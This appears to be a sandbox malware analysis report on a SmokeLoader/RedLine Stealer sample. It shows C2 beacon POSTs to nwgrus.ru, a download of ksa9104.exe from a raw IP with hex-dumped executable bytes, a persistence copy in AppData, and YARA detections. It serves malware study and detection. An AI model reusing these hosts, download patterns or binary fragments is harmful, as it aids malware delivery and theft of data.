Oct 12, 2024 20:10:34.773976088 CEST	239	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 75 1c b9 88 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vuuHlNiYgStXYd_u0Q:P(2Icy >P-{zJ0vP2~HZ+] 6ltHKjxN
Oct 12, 2024 20:10:36.229604006 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:10:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	60095	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:10:40.195491076 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ranxxolmdknfcjg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: nwgrus.ru
Oct 12, 2024 20:10:40.195527077 CEST	273	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 53 14 c7 a1 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vuS\|`]a0/.oil&A2C2V2HyT*47C rD7CNCI_b ooM&~# w
Oct 12, 2024 20:10:41.630479097 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:10:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	60096	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:10:44.934335947 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mqxuhbjviiy.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 264 Host: nwgrus.ru
Oct 12, 2024 20:10:44.934374094 CEST	264	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 3c c4 f6 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vu;<5Akd*Tk1%a7L#DQI\4y.] MXnxL7R7!\|zEoJRUcS3_fbG}12s
Oct 12, 2024 20:10:46.361423016 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:10:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	60097	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:10:50.241883039 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gbnguovvbpjawi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: nwgrus.ru
Oct 12, 2024 20:10:50.241919041 CEST	318	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 18 a0 80 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vu;HjY3jP-/)j\ixKxx2J"Y03TU3"kNT7U6'NQJ[^.Ej(Oyl;J
Oct 12, 2024 20:10:51.683959961 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:10:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	60098	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:10:55.442645073 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bkopsfqneci.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 290 Host: nwgrus.ru
Oct 12, 2024 20:10:55.442673922 CEST	290	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 40 e3 e3 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vu#@cNBk"sVr=#1}W7CK*He#7FjM$\|$ERMV8B?R_v,uE+5MZT7$(0
Oct 12, 2024 20:10:56.903294086 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:10:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	60099	175.119.10.231	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:11:02.607198000 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ugrocofopkun.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: nwgrus.ru
Oct 12, 2024 20:11:02.607198000 CEST	164	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 15 e5 f8 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA .[k,vunQLF!cV>"1U'3pP>>5wM:7OcqE
Oct 12, 2024 20:11:04.022588015 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:11:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	50001	23.145.40.164	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 18:08:05 UTC	162	OUT	GET /ksa9104.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 23.145.40.164
2024-10-12 18:08:06 UTC	327	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 18:08:05 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff Last-Modified: Sat, 12 Oct 2024 18:00:02 GMT ETag: "3b400-6244b5f680643" Accept-Ranges: bytes Content-Length: 242688 Connection: close Content-Type: application/x-msdos-program
2024-10-12 18:08:06 UTC	7865	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 e1 fc 79 dc 80 92 2a dc 80 92 2a dc 80 92 2a c2 d2 16 2a c7 80 92 2a c2 d2 07 2a cc 80 92 2a c2 d2 11 2a 96 80 92 2a fb 46 e9 2a d9 80 92 2a dc 80 93 2a b2 80 92 2a c2 d2 18 2a dd 80 92 2a c2 d2 06 2a dd 80 92 2a c2 d2 03 2a dd 80 92 2a 52 69 63 68 dc 80 92 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 bd 95 42 64 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$y*******F*******RichPELBd
2024-10-12 18:08:06 UTC	8000	IN	Data Raw: 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 91 13 00 00 83 c4 14 56 e8 7b 2d 00 00 40 59 83 f8 3c 76 38 56 e8 6e 2d 00 00 83 ee 3b 03 c6 6a 03 b9 5c aa 41 00 68 74 67 41 00 2b c8 51 50 e8 9c 2c 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 4e 13 00 00 83 c4 14 eb 02 33 f6 68 70 67 41 00 53 57 e8 02 2c 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 2a 13 00 00 83 c4 14 8b 45 fc ff 34 c5 ac 92 41 00 53 57 e8 dd 2b 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 05 13 00 00 83 c4 14 68 10 20 01 00 68 48 67 41 00 57 e8 50 2a 00 00 83 c4 0c eb 32 6a f4 ff 15 04 61 41 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac 92 41 00 ff 36 e8 b9 2c 00 00 59 50 ff 36 53 ff 15 00 61 41 00 5f 5e 5b c9 c3 6a 03 e8 95 2d 00 00 59 83 f8 01 74 15 6a 03 e8 88 Data Ascii: t3PPPPPV{-@Y<v8Vn-;j\AhtgA+QP,t3VVVVVN3hpgASW,tVVVVVE4ASW+tVVVVVh hHgAWP2jaA;t$tjEP4A6,YP6SaA_^[j-Ytj
2024-10-12 18:08:06 UTC	8000	IN	Data Raw: 85 d2 74 07 c6 02 00 42 89 55 0c ff 07 8b 4d 10 e9 0e ff ff ff 8b 45 08 5e 5b 85 c0 74 03 83 20 00 ff 01 c9 c3 8b ff 55 8b ec 83 ec 0c 53 33 db 56 57 39 1d 70 8f b1 02 75 05 e8 fe ea ff ff 68 04 01 00 00 be e8 aa 41 00 56 53 88 1d ec ab 41 00 ff 15 94 60 41 00 a1 60 8f b1 02 89 35 a4 a2 41 00 3b c3 74 07 89 45 fc 38 18 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0a fe ff ff 8b 45 f8 83 c4 0c 3d ff ff ff 3f 73 4a 8b 4d f4 83 f9 ff 73 42 8b f8 c1 e7 02 8d 04 0f 3b c1 72 36 50 e8 77 05 00 00 8b f0 59 3b f3 74 29 8b 55 fc 8d 45 f8 50 03 fe 57 56 8d 7d f4 e8 c9 fd ff ff 8b 45 f8 83 c4 0c 48 a3 88 a2 41 00 89 35 8c a2 41 00 33 c0 eb 03 83 c8 ff 5f 5e 5b c9 c3 8b ff 55 8b ec a1 f0 ab 41 00 83 ec 0c 53 56 8b 35 44 61 41 00 57 33 db 33 ff 3b c3 75 2e ff Data Ascii: tBUME^[t US3VW9puhAVSA`A`5A;tE8uuUEPSS}E=?sJMsB;r6PwY;t)UEPWV}EHA5A3_^[UASV5DaAW33;u.
2024-10-12 18:08:06 UTC	8000	IN	Data Raw: 89 b5 d0 fd ff ff 89 bd cc fd ff ff 66 8c 95 f8 fd ff ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff ff 66 8c 85 c4 fd ff ff 66 8c a5 c0 fd ff ff 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 75 04 8d 45 04 89 85 f4 fd ff ff c7 85 30 fd ff ff 01 00 01 00 89 b5 e8 fd ff ff 8b 40 fc 6a 50 89 85 e4 fd ff ff 8d 85 d8 fc ff ff 6a 00 50 e8 65 e5 ff ff 8d 85 d8 fc ff ff 83 c4 0c 89 85 28 fd ff ff 8d 85 30 fd ff ff 6a 00 c7 85 d8 fc ff ff 15 00 00 40 89 b5 e4 fc ff ff 89 85 2c fd ff ff ff 15 d8 60 41 00 8d 85 28 fd ff ff 50 ff 15 d4 60 41 00 6a 03 e8 c9 ac ff ff cc 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 83 a7 ff ff 0f b6 45 0c 8b 4d f4 8a 55 14 84 54 01 1d 75 1e 83 7d 10 00 74 12 8b 4d f0 8b 89 c8 00 00 00 0f b7 04 41 23 45 10 eb 02 33 c0 85 c0 74 03 33 c0 40 80 Data Ascii: ffffffuE0@jPjPe(0j@,`A(P`AjUuMEMUTu}tMA#E3t3@
2024-10-12 18:08:06 UTC	8000	IN	Data Raw: 0a c5 8a 19 6f 3b 68 75 21 e3 1f b2 10 d1 6e 2a 68 92 db af 29 1d 20 dd cc d2 c3 33 b9 e4 b7 52 48 06 5d 50 44 c3 57 75 f9 54 7a a9 b4 2f 7c 05 bb cb 25 03 3e 82 d3 40 04 fb 10 f0 0b 1f 78 e7 ea 29 80 ca 10 1f 71 44 be be ad 49 17 93 ff e7 fa 5a 0b d0 75 8d 28 eb 3a 8f 62 d8 46 f8 a4 83 b1 b3 cf b5 75 fe b0 ca ef f2 ae 20 04 6f 94 30 9b 23 88 de 73 3c 26 bf b7 a1 9b 49 8c ab 23 65 5e 9a 8e 3f b4 6c e5 3c 85 f5 07 80 71 fc da f5 0a 62 4e b2 53 19 77 24 b6 c4 92 81 de 7e c8 a6 82 6a a8 8b 35 15 76 8f 8e 82 f7 d8 10 c9 99 95 7b b7 7b cc bd a5 d7 ab e7 63 df a1 80 04 33 7c cc 74 ab 1a 5d 6d cb b3 dc 5c 3f a8 f9 30 22 3a d8 fb 5a cc 18 b2 88 42 f2 52 45 49 b0 f7 47 d5 6e bf d1 82 8c 58 16 7c fe f2 9e b0 89 47 85 db d1 39 e1 24 c4 05 e1 46 86 45 45 38 68 d9 fd Data Ascii: o;hu!n*h) 3RH]PDWuTz/\|%>@x)qDIZu(:bFu o0#s<&I#e^?l<qbNSw$~j5v{{c3\|t]m\?0":ZBREIGnX\|G9$FEE8h
2024-10-12 18:08:06 UTC	8000	IN	Data Raw: 83 d0 06 e9 0d 9c 9d fb 01 b7 d8 5f d3 af d7 65 7d 09 0b f2 9a 1c bb 6d 93 6a ad 7f 68 8b b2 55 2c ba 52 d2 e3 bc ed dd e6 c0 57 0b 4a 3d ba 97 f6 fd 91 c6 b3 6a 16 52 c1 98 bd 3a e9 3d 12 75 fa de 44 9f 32 53 9f 6b a0 1b b5 ad 36 7c 76 45 93 4e 25 a9 f6 c2 82 d4 52 74 d4 40 42 dc 15 79 65 8f 11 14 31 77 96 db 8d b0 84 a8 e2 c1 89 54 08 af 0c 14 9c ff 8d c1 a7 fd 78 e2 31 a7 f9 02 5c 27 89 66 e1 97 f6 61 bd 71 16 49 63 64 91 a2 e6 a3 2f fe 2e e6 f7 8a 0f ea 3e 8a 87 59 78 16 99 45 dd 96 05 79 9e a2 81 39 0a 92 ec e5 13 0d a9 c7 40 90 09 78 fe e7 13 0c 88 3c a5 43 18 bb a1 0b 28 60 9a 3e 94 47 98 fa 68 74 e3 62 8a 6f 70 3b a1 e5 08 89 44 30 74 7b 8d 15 aa d2 a9 f7 60 b4 70 bf 4a 47 ad 27 41 7e e6 a7 a5 31 3f 80 74 dc 77 54 79 1d f4 b5 dc 24 84 76 3f 13 4c Data Ascii: _e}mjhU,RWJ=jR:=uD2Sk6\|vEN%Rt@Bye1wTx1\'faqIcd/.>YxEy9@x<C(`>Ghtbop;D0t{`pJG'A~1?twTy$v?L
2024-10-12 18:08:06 UTC	8000	IN	Data Raw: 0b ca 5d 78 0d 6e d9 ee 30 68 e5 7a 87 b7 ac 65 97 54 1f 6a ea b8 20 df 4d c8 88 c7 f4 8c 6e 54 6f 6a 18 d3 e4 c4 75 c3 6a d8 10 60 0b 9e 70 17 85 53 c5 5b 43 2d 4b 15 2f 59 ca e4 43 d6 85 f3 22 73 51 87 87 f1 24 d7 ee 52 ef 14 77 5d c3 0f 46 90 e4 46 aa 7b 92 07 29 02 98 02 c4 50 59 63 04 0b 13 9a eb e2 49 a5 81 1f 50 98 2c 4e 78 f8 61 7b 82 85 0f 93 0d 93 9d f6 19 26 ed f7 f2 b8 76 dd 17 de 69 95 01 dd 86 49 bb af a3 dd 13 0e d1 1f b9 08 59 68 1e 43 f3 7d b0 9d 99 48 e1 26 e5 5c db a4 30 89 47 b1 3b b7 6a 4c 0a 31 5c 14 72 1d b2 c2 70 6b ac bd a8 1f 2a 0b 58 b6 56 3b ac 8e 80 59 07 12 49 cc 97 6a 5e 28 bf 10 0f af a0 f8 76 60 70 29 68 28 e7 55 50 4a 07 0d ae e5 68 db 24 d4 67 56 a9 23 44 47 17 f1 c3 ac 0d d6 ea 6e 56 4b 67 42 17 26 31 fa f9 04 ec 76 77 Data Ascii: ]xn0hzeTj MnTojuj`pS[C-K/YC"sQ$Rw]FF{)PYcIP,Nxa{&viIYhC}H&\0G;jL1\rpk*XV;YIj^(v`p)h(UPJh$gV#DGnVKgB&1vw
2024-10-12 18:08:06 UTC	8000	IN	Data Raw: a8 a1 aa c1 a1 39 bd 00 40 35 0d 79 96 a8 7d 43 35 40 c8 e0 b2 cb a5 6a 43 44 57 bd d6 15 3e 10 56 b9 48 03 24 77 8c 10 16 59 b7 36 2a ba ee 37 0e e4 e6 ac 4a 3f 66 8e 19 ab 35 71 52 12 ef 28 8b bb ca 97 04 ed 5b 84 bc 2f e7 0f 11 b9 90 a2 99 d0 42 e3 ef c1 e6 75 e6 fa 22 62 30 ea d6 b0 2d c9 0e f4 8d 32 f8 da 1a 34 4d 9c 69 9f 8a f1 d6 1c ef 12 e5 c1 d0 be 89 1b e5 32 7a 9d a2 2c e0 ff 0c 04 03 61 4a 56 89 c8 c5 4a 14 ad 94 d3 3f 1b 63 b0 c9 9f 1d ca 63 a6 1f a5 1b 60 89 c2 ac 85 98 8e 0b fb e5 ff a3 48 7e a7 30 8d ca 06 a5 96 58 39 33 f8 52 29 6f 8e c6 1a b6 38 75 05 67 98 94 f2 d4 4c 24 36 24 b8 46 22 23 9a bf 23 86 dd 47 dc c5 52 dd 50 81 5c fe 1f f1 a8 c0 00 c9 96 2e 48 73 eb 5c 03 27 af dc 93 00 d7 55 63 8d dd fa bd 6a b2 2e 83 f4 7b ce 30 9d fa 1d Data Ascii: 9@5y}C5@jCDW>VH$wY6*7J?f5qR([/Bu"b0-24Mi2z,aJVJ?cc`H~0X93R)o8ugL$6$F"##GRP\.Hs\'Ucj.{0
2024-10-12 18:08:06 UTC	8000	IN	Data Raw: bc 31 2b 96 dd e0 ba ef 96 af 0d 99 e1 e4 82 7b 27 c5 04 ae e3 b8 40 60 3b 3e b7 e8 54 35 4e 7a bb 6d d7 72 38 de 9e ec 1d cd 1a 54 4c 11 b7 a7 a3 f3 79 0d 72 0d 8f 8f 06 6e 61 48 f5 56 c1 1a 6a 49 32 8d 9f 23 31 70 60 b1 0b 9f 44 c6 d6 de 50 68 96 bd 03 3c f2 2a 05 68 4c 63 43 d7 ef c4 3c 1f 8a 85 6e 1c aa bd e3 c5 c7 62 88 56 25 9f eb 2d 92 da 7f 2a 8d ba ed 46 a7 5c 82 70 3a 5c a3 1c 3a 4a d6 f2 d5 7d 20 8c f8 80 15 55 9f 5e 59 ba 72 77 9a 99 f2 30 28 0a ae 59 ad 6c 3f 6d 76 3c a3 08 98 42 65 d7 1e 3d 6a c4 84 aa bc 9d 0f 7a 54 ca 4e b8 c6 e5 ad f0 6f af 62 70 c4 8c 9e 28 ba 99 a1 5a 8f 2b 8f 0e 0d 4c 4a 66 88 f0 5b 9d 14 46 ac ef fc f5 62 7d 6b 6c c9 c7 64 9b 2c 49 26 a8 07 0e 2e 55 c3 b3 28 12 32 c8 99 f4 6b 0c 26 0b f4 cd 8a 14 02 e7 42 a0 ec ec a8 Data Ascii: 1+{'@`;>T5Nzmr8TLyrnaHVjI2#1p`DPh<hLcC<nbV%-F\p:\:J} U^Yrw0(Yl?mv<Be=jzTNobp(Z+LJf[Fb}kld,I&.U(2k&B
2024-10-12 18:08:06 UTC	8000	IN	Data Raw: f7 ad 26 b9 cc ca ea f0 31 93 06 56 5e a8 a3 33 97 26 97 bd 6e 2f 31 e2 ac b9 61 ec 54 6e d3 88 bb cb fd ba d4 61 37 93 2a e9 b0 28 dd 8c 4e 3a 74 2c 24 1c 0a 09 19 28 78 67 df 7f d5 42 46 8c e8 8a c1 40 11 1e ac 5e 2f f0 72 9c 55 f8 84 f0 de 1f 76 e3 05 55 bb 71 88 49 13 0d b5 50 59 0c 6c 7a 8c c4 b2 c6 e3 a9 d1 0f 5e ef bc da 6c 0a fb 38 92 b7 23 69 62 01 1e e6 c4 b9 9f 3a 74 8f 58 39 59 35 d5 cd 79 d7 4c 23 88 50 1f 6d 49 f8 d3 16 b8 4a 30 a8 7f b9 58 b2 8b ca 23 37 b4 0c 7b 03 c6 50 88 7d c5 76 eb 53 8e 24 6c d1 ab 64 c6 1e 6d e0 36 35 2c 21 08 38 cb c6 2e c9 22 a1 47 0e 2f 3f cf f0 61 de 41 c4 b6 2b 04 25 8c 02 87 d3 f4 c4 7f 70 d5 53 d8 e7 65 16 39 d8 50 90 fa 2f 59 ab 56 30 47 6b b1 c2 69 7b fd 88 f4 05 94 e6 66 fd d9 b8 0c 1a 1d 5a bc f3 95 e8 a6 Data Ascii: &1V^3&n/1aTna7*(N:t,$(xgBF@^/rUvUqIPYlz^l8#ib:tX9Y5yL#PmIJ0X#7{P}vS$ldm65,!8."G/?aA+%pSe9P/YV0Gki{fZ

Target ID:	0
Start time:	14:06:55
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\mGFoU1INUk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\mGFoU1INUk.exe"
Imagebase:	0x400000
File size:	243'200 bytes
MD5 hash:	18DAA2C6A6F6385895582D4E9954D851
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2147151739.0000000002C47000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2148008408.0000000002FF1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2147911658.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2147438487.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:07:04
Start date:	12/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	14:07:24
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\ibjgueh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ibjgueh
Imagebase:	0x400000
File size:	243'200 bytes
MD5 hash:	18DAA2C6A6F6385895582D4E9954D851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2419910079.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2420146039.0000000002F01000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs Detection: 36%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:10:02
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\ibjgueh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ibjgueh
Imagebase:	0x400000
File size:	243'200 bytes
MD5 hash:	18DAA2C6A6F6385895582D4E9954D851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	30.2%
Signature Coverage:	43.2%
Total number of Nodes:	162
Total number of Limit Nodes:	6

Executed Functions

Function 00415BA0 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 283
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415C72
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415C8B
FindAtomW.KERNEL32(00000000), ref: 00415C92
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C9A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415CB2
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415CD9
MoveFileW.KERNEL32(00000000,00000000), ref: 00415CE1
GetVersionExW.KERNEL32(?), ref: 00415CEE
DisconnectNamedPipe.KERNEL32(?), ref: 00415D01
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415D46
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415D55
LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415D6B
PulseEvent.KERNEL32(00000000), ref: 00415D7B
SetCommState.KERNELBASE(00000000,00000000), ref: 00415DA4
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415DD5
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415DE6
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415DEE
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415E2E
GetFileAttributesA.KERNEL32(00000000), ref: 00415E35
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415E3B
GetBinaryType.KERNEL32(0041742C,?), ref: 00415E4D
LoadLibraryA.KERNELBASE(00417438), ref: 00415ED2

Strings

k`, xrefs: 00415F03
}$, xrefs: 00415F27

Memory Dump Source

Source File: 00000000.00000002.2143598298.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

